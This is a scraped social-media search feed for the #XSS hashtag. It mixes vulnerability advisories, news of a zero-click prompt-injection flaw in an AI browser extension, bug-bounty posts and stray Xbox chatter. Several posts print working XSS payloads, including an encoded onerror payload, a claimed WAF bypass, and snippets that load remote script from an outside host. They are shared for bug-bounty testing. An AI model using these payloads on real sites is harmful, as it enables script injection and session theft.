#XSs — Search — Horizon

No JavaScript? That's cool, but you'll need to disable Turbo mode as it uses JavaScript in the client.

⚡ CVE-2026-20108: Cisco ... Authenticated XSS in Cisco's SD-WAN nerve center - low-hanging fruit for lateral movement through network admin sessions. #CiscoVuln #SDWAN #XSS. zerodaysignal.com/vulnerability/… #netsec #vulnerability #CVE #sysadmin #zeroday

PulsePatch.io @pulsepatchio · 22h

`OpenBao` is vulnerable to Reflected XSS (CVE-2026-33758) via OIDC authentication error messages. This can lead to client-side script execution. Monitor for updates. #OpenBao #XSS #infosec pulsepatch.io/posts/cve-2026…

ThreadLinqs @threadlinqs · 1d

NEW THREAT INTEL: ShadowPrompt -- Zero-Click Prompt Injection via DOM XSS in CAPTCHA + Claude Extension Bypass. 9 detections, 15 IOCs. intel.threadlinqs.com/#TL-2026-0291 #ThreatIntel #CyberSecurity #XSS #AI

ThreadLinqs @threadlinqs · 1d

NEW THREAT INTEL: ShadowPrompt -- Zero-click prompt injection via DOM XSS in CAPTCHA + Chrome Extension bypass. 9 detections, 15 IOCs. intel.threadlinqs.com/#TL-2026-0291 #ThreatIntel #CyberSecurity #XSS #PromptInjection

Wordpressvulnerability @Wordpressbugs · 1d

⚠️ Plugin Slideshow (≤2.3.1) vulnera con XSS almacenado. CVSS 4.8 (medio). No hay parche; se recomienda desinstalar. Más de 70k instalaciones en riesgo. #WordPress #Seguridad #XSS t.me/vulnerabilityw…

Vulnerability Finder

Latest news about vulnerability in Wordpress and more! Las últimas vulnerabilidades encontradas en Wordpress

From t.me

motch | セキュリティ🛡️ @motch_dev · 1d

🚨 Claude拡張機能にゼロクリックXSS脆弱性発覚！😱 AnthropicのClaude拡張機能に、ウェブサイト訪問だけで悪意あるプロンプトが実行される脆弱性が存在。影響範囲が広く、即時アップデートを！️あなたのブラウザは大丈夫？ #セキュリティ #XSX6

Meteorologist Andrew Kieckhefer @IBMtwc · 1d

Found dinosaur of a draft to read and finalize for my person. Would you read the final iteration? Questions about the author? #thankyouSevi #AM #XSs @BankofAmerica

ScyScan @ScyScan · 1d

#Claude #Extension Flaw Enabled Zero-Click #XSS Prompt Injection via Any Website scyscan.com/news/claude-ex…

Claude Extension Flaw Enabled Zero-Click XSS Prompt Injection via Any Website | ScyScan

Cybersecurity researchers have disclosed a vulnerability in Anthropic's Claude Google Chrome Extension that could have been exploited to trigger malicious pr...

From scyscan.com

/home/rizal @rizalchoirur_ · 1d

XSS on Nokia subdomain with @KN0X55 🔥 Payloads: 1\47\42\74\102\40\55\55\76\74Img\40Src\40OnError\75confirm\140\113\140\76 #xss #bugbountytips #infosecl

151

7.6K

iT4iNT SERVER Pvt Ltd @it4int · 1d

iT4iNT SERVER Claude Extension Flaw Enabled Zero-Click XSS Prompt Injection via Any Website dlvr.it/TRjjNP VDS VPS Cloud #Cybersecurity #XSS #HackerNews #DataProtection #Vulnerability

Claude Extension Flaw Enabled Zero-Click XSS Prompt Injection via Any Website

Claude extension flaw enabled silent prompt injection via XSS and weak allowlist, risking data theft and impersonation until Feb 19, 2026 fix.

From thehackernews.com

Fernando Karl @fernandokarl · 1d

⚠️ Atenção, administradores de OpenEMR! Uma vulnerabilidade de stored XSS no preview de documentos CCDA foi corrigida na v8.0.0.3. Sistemas desatualizados estão em risco de comprometimento. 🚨 Atualize agora e proteja-se! #Cybersecurity #OpenEMR #XSS �tenable.com/cve/CVE-2026-3…JR

Fernando Karl @fernandokarl · 1d

🚨 Attention WordPress users! CVE-2026-1986 exposes FloristPress for Woo to reflected XSS attacks up to version 7.8.2! 🔒 Update your plugin ASAP to avoid potential data theft and phishing risks. Stay safe and secure! #CyberSecurity #WordPress #XSS tenable.com/cve/CVE-2026-1…XX

Bugv @bugvsecurity · 2d

Which is more dangerous: SQL Injection or XSS Attack? Both are critical threats, but their impact depends on your system's vulnerabilities. What's your answer? Drop your response in the comments! #CyberSecurity #SQLInjection #XSS #WebSecurity #Bugv #SecurityQuiz

178

The Legendary Xbot @DaLegendaryXbot · 2d

That's what u call treating your wife like a Queen. And before anybody hate on the XSS just remember it run games better than the Switch 2 and a lot of Women love the Switch 2 also 👌�� #Xbox #XSS

Scrag @ScragtheScav · 2d

My wife wanted to start gaming with me (mostly fallout 76 and ESO) so I went out and got her an Xbox ! #XboxSeriesS

xss0r @xss0r · 2d

🔥 Cloudflare WAF? Bypassed. ('/alert?.(7)/') Hundreds of payloads blocked… But one slipped through 👀 ✅ XSS triggered ✅ WAF bypass confirmed Never trust a single layer of defense. #bugbounty #xss #hacking #xss0Hi

107

A.Mugh33ra🇵🇰❤️🇵🇸 @mugh33ra · 3d

Chained Self‑Stored XSS and Achieved Full 0‑Click ATO 🎯 Honestly, it took me 3 full working days to achieve ATO becasue i am not professional 🙂 Now, hoping for the best InshAllah. Want the write‑up? Drop a comment and I’ll share the full breakdown. �� #BugBounty #ATO #XCm6

1.8K

0xmru 🇮🇳 @mrunal110 · 3d

Sharing XSS Challenge Writeup - Intigriti March 2026 Result: Full admin cookie exfiltration. Props to @KulinduKodi for the challenge design & @intigriti for the platform! #xss Read the full writeup: chawdamrunal.medium.com/intigriti-marc…

Intigriti March 2026 XSS Challenge Writeup: Chaining 3 Bypasses to Steal Admin Cookies

How a DOM clobber, a component hijack, and a hidden JSONP endpoint gave me full cookie exfiltration through DOMPurify + CSP + SANITIZE_DOM…

From chawdamrunal.medium.com

706

Marduk James @marduk_i_am · 3d

This looks like a harmless redirect: location.href = userInput It’s not. If you can control it, you can execute JavaScript in the page’s context. I just published Why location.href Isn’t Just a Redirect: medium.com/p/why-location… #xss #BugBounty #ethicalhacking #CyberSecurity

KNOXSS @KN0X55 · 3d

Improve your #XSS PoCs! Use a remote call to our X55.is domain: ➡️ Replacing alert(1) '-import('//X55.is')-' <Img Src=//X55.is OnLoad=import(src)> ➡️ As href/src attribute <Base Href=//X55.is> <Script Src=//X55.is> ➡️ Jumping to # for custom JS x55.is/brutelogic/gym…

2.8K

Brute Logic @BRuteLogic · 3d

Remote Script Call - import() Alternatives jQuery's $.get() & $.getScript() 1. $ is alias for jQuery 2. $.get() can be used with jQuery < v3.2.1 3. both accept `` instead of () with attributes 4. tolerate spaces, new lines etc <Img Src=//X55.is Onload=$.get`src`> #XSS #Bypass

2.6K